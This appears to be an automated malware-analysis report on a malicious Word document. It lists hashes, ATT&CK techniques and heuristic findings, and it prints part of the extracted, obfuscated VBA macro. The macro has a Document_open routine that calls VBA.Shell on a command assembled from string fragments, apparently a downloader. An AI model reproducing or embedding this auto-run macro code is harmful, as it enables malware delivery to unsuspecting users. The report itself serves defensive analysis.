Office (OLE) malware analysis — malicious · 1782d1c2a904dd53

MALICIOUS

Office (OLE)

148.2 KB Created: 2018-07-24 20:09:00 Authoring application: Microsoft Office Word First seen: 2020-04-06

MD5: a8f7d23ee22b05e9a207b41001162cfb SHA-1: 686faec0c7ff21f25d79bedb6fe077885c333ddd SHA-256: 1782d1c2a904dd53cc53996afcae3c7b8ee18422937faf65d0bb671cb7a9630f

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The obfuscated nature of the VBA code and the use of Shell() suggest a downloader or droppper functionality.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27016 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	27016 bytes
SHA-256: `d980162399db7de30c3cf1f96dfe1abbd149cebfcd2169dc6c4f3d3699c35e6b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "CnbHrvUltaijFo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function HocDsTTHVuf() On Error Resume Next zjYVhm = ChrW(46) ZpXJMt = ChrB(GzwFd) QXPkwo = Hex(6756) KucXYD = Atn(708) LXiiAY = Oct(UmjdTp) Dutuki = Chr(KSzzd) End Function Private Function JXtijzpKof() On Error Resume Next Esvwa = Fix(Qibqsw) roaYr = IMkrEi nPuPUj = Hex(IOmzfi) WwoDR = CStr(izKOI) End Function Private Function SbZqjwGbtqi() On Error Resume Next MFVHsi = CByte(JAbcE) wYZPjw = Atn(31542 / WQkjQz * 27414 - 22678) DhsYi = CInt(66465 + BwvCtT + JNiWWL / mhdMwl) hGlFm = ChrW(FXfwQt) jGiOsm = Sgn(5) bnJLTq = lFRfJ Orwcra = 2343 End Function Private Function kUvSiHO() On Error Resume Next RIvGFC = dESmPX wWGYD = MjBch PvdJzu = Rnd(4372) juiFFA = ChrW(1436) clINjj = Chr(fQZUwo) End Function Private Function UFIMzaiGPAXQS() On Error Resume Next AIbnb = 2 wjTGw = 413068242 vtArM = Cos(kCYPZ) iZHVa = ChrW(81) End Function Private Sub Document_open() On Error Resume Next aasAJ = Tan(939) jTvad = Cos(944) NdKiFE = WInad tiXMw = sKRCP LILiI = Sin(3) VBA.Shell "" + VhHmzhhouuwX + JjCDzVa + CVar("C") + ztmnCRiwjfmnGT + fwiAfhXDUQJz + cvNoiqIv + ZWRCGKEZ + TsijajOOKW + RszUsmRKJq + iPZYSdbG + NmJEoDfhQa + adQPBkC + iqkizOGVNQ + YFrTBF + UWismKwfr + XMFEt + LBwkLfLFT + ScljJWC + ifijNFLV + SXukAKzl + CNAvaGj + KoLkvBvnGd + zjVsZDmKHIp + BNbwh + lzXMNU + YtikrQ + LrHtzZw + GOaKbhdkiV + VirZozBOP + bJzEvSJ + WwJTRWjSmI + HTicYLzYlUHnj, 0 sDOtkl = CByte(224800985) End Sub Private Function uzXYzhkps() On Error Resume Next ipFrj = CDate(fjpZfB) pFZMV = Int(6) fdiWD = 5 XJmFX = 3979 psmiCb = Sqr(271145631) KOzUA = Hex(441634975) End Function Private Function vujitMzIqkXDM() On Error Resume Next OmmiLh = 8 WRjzF = Round(92) ToFwm = CSng(97) AjDZu = Round(34456 * ZJTcJF + 19444 * 97925) XPwtG = fczlY GYpoa = Oct(AaSwaj) OFfpw = 80 End Function Private Function BPqXbasP() On Error Resume Next zXZzJN = Chr(mdBoYi) fkLUBb = FtNOV IFMOj = CBool(5228) ArqPYO = CBool(FDfSaJ / ZzKcr) pVmWj = 5 IYjoi = CInt(PwiCp) End Function Attribute VB_Name = "SowcUVL" Function cvNoiqIv() On Error Resume Next nslCB = Atn(1) RPFLT = Atn(24) zZYfNHWH = CStr(Chr(dlrJbPWIlXGI + VpUjfwtazj + 109 + RQPivaHdOF + ThHNzYnNRlRJpo)) + "d rloZjw" vDpOt = CDate(OPhXri) rcUFc = Hex(8) IfuzdCKOBBa = "N" + CStr(Chr(sDlHiCz + GcfAWIQSXNwqj + 99 + vMHjwFpHQBk + POQkCUswIN)) + "FaHs fb" + "L" + "HaT" + "SSiE" BEaYdD = 3060 jVSCFA = BOpIkh DCwwzTIc = "t" + CStr(Chr(BqSbMPMbKLV + GnRVPwlzw + 109 + wOoLjinz + zPXfDmX)) + "kqEUszC" + "WYOr lv" nFcTBB = CDate(15108 + jBMcRJ) kvXdrO = ChrB(RuLXUw + rNnfJB) ErhGThqL = "i" + CStr(Chr(DsVTvhbb + JiEnJfwaA + 109 + XWjMJYtpLMN + zQautiHCulCZs)) + "SrhXTv & " + " %" + CStr(Chr(AFMWqcfWl + JhlhBvPRntED + 99 + kddkhmQwfp + qYKTtooGVaQNjG)) + "o" + CStr(Chr(oUvCfAFzCmE + MBwbCFrHTz + 109 + aBKMPAbdp + tDUqSLRH)) + "Sp" zNqpW = CBool(43) nqfsBr = "E" + CStr(Chr(kIYUlhBRTU + mEzvmnldqjF + 99 + YhOZvCs + pslsiTZLWnpOQP)) + "% /" + CStr(Chr(YiVHiEDiRM + rXScArPGKuJS + 99 + KRAoIRXDXYX + kpDaRTnTw)) + " CMd" + " /" + CStr(Chr(OYAkMiUDD + lhdEiOoAtEbbiR + 99 + rzPKLwmajQ + sDUURpDWwMkYf)) + " " + CStr(Chr(JmzVSFJdDno + uDVRbzHqkHJpO + 34 + fOqfOVdomv + iaQjdGObsrTz)) + " SET " + " lf7W=k" + "& set " + "a5=." + CStr(Chr(lZinjEUlzozIU + PiWGLZPTa + 99 + AJfovtwYjEJw + RwdbjUmuL)) + "o&" cvNoiqIv = zZYfNHWH + IfuzdCKOBBa + DCwwzTIc + ErhGThqL + nqfsBr OzHSA = Chr(NaJJi) NiKqX = Cos(29315692) End Function Function ZWRCGKEZ() On Error Resume Next jKTWYLcHiT = "&" + " " + "sET " + " ST" + "F=E" + "@ht" UuOGRGRR = "&&" + " sET uYf" + "j=o& " + " SeT ut" + "=/&& ... (truncated)

SHA-256: d980162399db7de30c3cf1f96dfe1abbd149cebfcd2169dc6c4f3d3699c35e6b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "CnbHrvUltaijFo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function HocDsTTHVuf()
On Error Resume Next
   zjYVhm = ChrW(46)
   ZpXJMt = ChrB(GzwFd)
   QXPkwo = Hex(6756)
   KucXYD = Atn(708)
   LXiiAY = Oct(UmjdTp)
   Dutuki = Chr(KSzzd)
End Function
Private Function JXtijzpKof()
On Error Resume Next
   Esvwa = Fix(Qibqsw)
   roaYr = IMkrEi
   nPuPUj = Hex(IOmzfi)
   WwoDR = CStr(izKOI)
End Function
Private Function SbZqjwGbtqi()
On Error Resume Next
   MFVHsi = CByte(JAbcE)
   wYZPjw = Atn(31542 / WQkjQz * 27414 - 22678)
   DhsYi = CInt(66465 + BwvCtT + JNiWWL / mhdMwl)
   hGlFm = ChrW(FXfwQt)
   jGiOsm = Sgn(5)
   bnJLTq = lFRfJ
   Orwcra = 2343
End Function
Private Function kUvSiHO()
On Error Resume Next
   RIvGFC = dESmPX
   wWGYD = MjBch
   PvdJzu = Rnd(4372)
   juiFFA = ChrW(1436)
   clINjj = Chr(fQZUwo)
End Function
Private Function UFIMzaiGPAXQS()
On Error Resume Next
   AIbnb = 2
   wjTGw = 413068242
   vtArM = Cos(kCYPZ)
   iZHVa = ChrW(81)
End Function
Private Sub Document_open()
On Error Resume Next
   aasAJ = Tan(939)
   jTvad = Cos(944)
   NdKiFE = WInad
   tiXMw = sKRCP
   LILiI = Sin(3)
VBA.Shell "" + VhHmzhhouuwX + JjCDzVa + CVar("C") + ztmnCRiwjfmnGT + fwiAfhXDUQJz + cvNoiqIv + ZWRCGKEZ + TsijajOOKW + RszUsmRKJq + iPZYSdbG + NmJEoDfhQa + adQPBkC + iqkizOGVNQ + YFrTBF + UWismKwfr + XMFEt + LBwkLfLFT + ScljJWC + ifijNFLV + SXukAKzl + CNAvaGj + KoLkvBvnGd + zjVsZDmKHIp + BNbwh + lzXMNU + YtikrQ + LrHtzZw + GOaKbhdkiV + VirZozBOP + bJzEvSJ + WwJTRWjSmI + HTicYLzYlUHnj, 0
   sDOtkl = CByte(224800985)
End Sub
Private Function uzXYzhkps()
On Error Resume Next
   ipFrj = CDate(fjpZfB)
   pFZMV = Int(6)
   fdiWD = 5
   XJmFX = 3979
   psmiCb = Sqr(271145631)
   KOzUA = Hex(441634975)
End Function
Private Function vujitMzIqkXDM()
On Error Resume Next
   OmmiLh = 8
   WRjzF = Round(92)
   ToFwm = CSng(97)
   AjDZu = Round(34456 * ZJTcJF + 19444 * 97925)
   XPwtG = fczlY
   GYpoa = Oct(AaSwaj)
   OFfpw = 80
End Function
Private Function BPqXbasP()
On Error Resume Next
   zXZzJN = Chr(mdBoYi)
   fkLUBb = FtNOV
   IFMOj = CBool(5228)
   ArqPYO = CBool(FDfSaJ / ZzKcr)
   pVmWj = 5
   IYjoi = CInt(PwiCp)
End Function


Attribute VB_Name = "SowcUVL"
Function cvNoiqIv()
On Error Resume Next
nslCB = Atn(1)
   RPFLT = Atn(24)
zZYfNHWH = CStr(Chr(dlrJbPWIlXGI + VpUjfwtazj + 109 + RQPivaHdOF + ThHNzYnNRlRJpo)) + "d rloZjw"
vDpOt = CDate(OPhXri)
   rcUFc = Hex(8)
IfuzdCKOBBa = "N" + CStr(Chr(sDlHiCz + GcfAWIQSXNwqj + 99 + vMHjwFpHQBk + POQkCUswIN)) + "FaHs fb" + "L" + "HaT" + "SSiE"
BEaYdD = 3060
   jVSCFA = BOpIkh
DCwwzTIc = "t" + CStr(Chr(BqSbMPMbKLV + GnRVPwlzw + 109 + wOoLjinz + zPXfDmX)) + "kqEUszC" + "WYOr lv"
nFcTBB = CDate(15108 + jBMcRJ)
   kvXdrO = ChrB(RuLXUw + rNnfJB)
ErhGThqL = "i" + CStr(Chr(DsVTvhbb + JiEnJfwaA + 109 + XWjMJYtpLMN + zQautiHCulCZs)) + "SrhXTv  & " + " %" + CStr(Chr(AFMWqcfWl + JhlhBvPRntED + 99 + kddkhmQwfp + qYKTtooGVaQNjG)) + "o" + CStr(Chr(oUvCfAFzCmE + MBwbCFrHTz + 109 + aBKMPAbdp + tDUqSLRH)) + "Sp"
zNqpW = CBool(43)
nqfsBr = "E" + CStr(Chr(kIYUlhBRTU + mEzvmnldqjF + 99 + YhOZvCs + pslsiTZLWnpOQP)) + "%  /" + CStr(Chr(YiVHiEDiRM + rXScArPGKuJS + 99 + KRAoIRXDXYX + kpDaRTnTw)) + " CMd" + "   /" + CStr(Chr(OYAkMiUDD + lhdEiOoAtEbbiR + 99 + rzPKLwmajQ + sDUURpDWwMkYf)) + "  " + CStr(Chr(JmzVSFJdDno + uDVRbzHqkHJpO + 34 + fOqfOVdomv + iaQjdGObsrTz)) + "  SET   " + "  lf7W=k" + "&   set   " + "a5=." + CStr(Chr(lZinjEUlzozIU + PiWGLZPTa + 99 + AJfovtwYjEJw + RwdbjUmuL)) + "o&"
cvNoiqIv = zZYfNHWH + IfuzdCKOBBa + DCwwzTIc + ErhGThqL + nqfsBr
   OzHSA = Chr(NaJJi)
   NiKqX = Cos(29315692)
End Function
Function ZWRCGKEZ()
On Error Resume Next
jKTWYLcHiT = "&" + "    " + "sET    " + " ST" + "F=E" + "@ht"
UuOGRGRR = "&&" + " sET uYf" + "j=o&  " + "  SeT   ut" + "=/&& 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.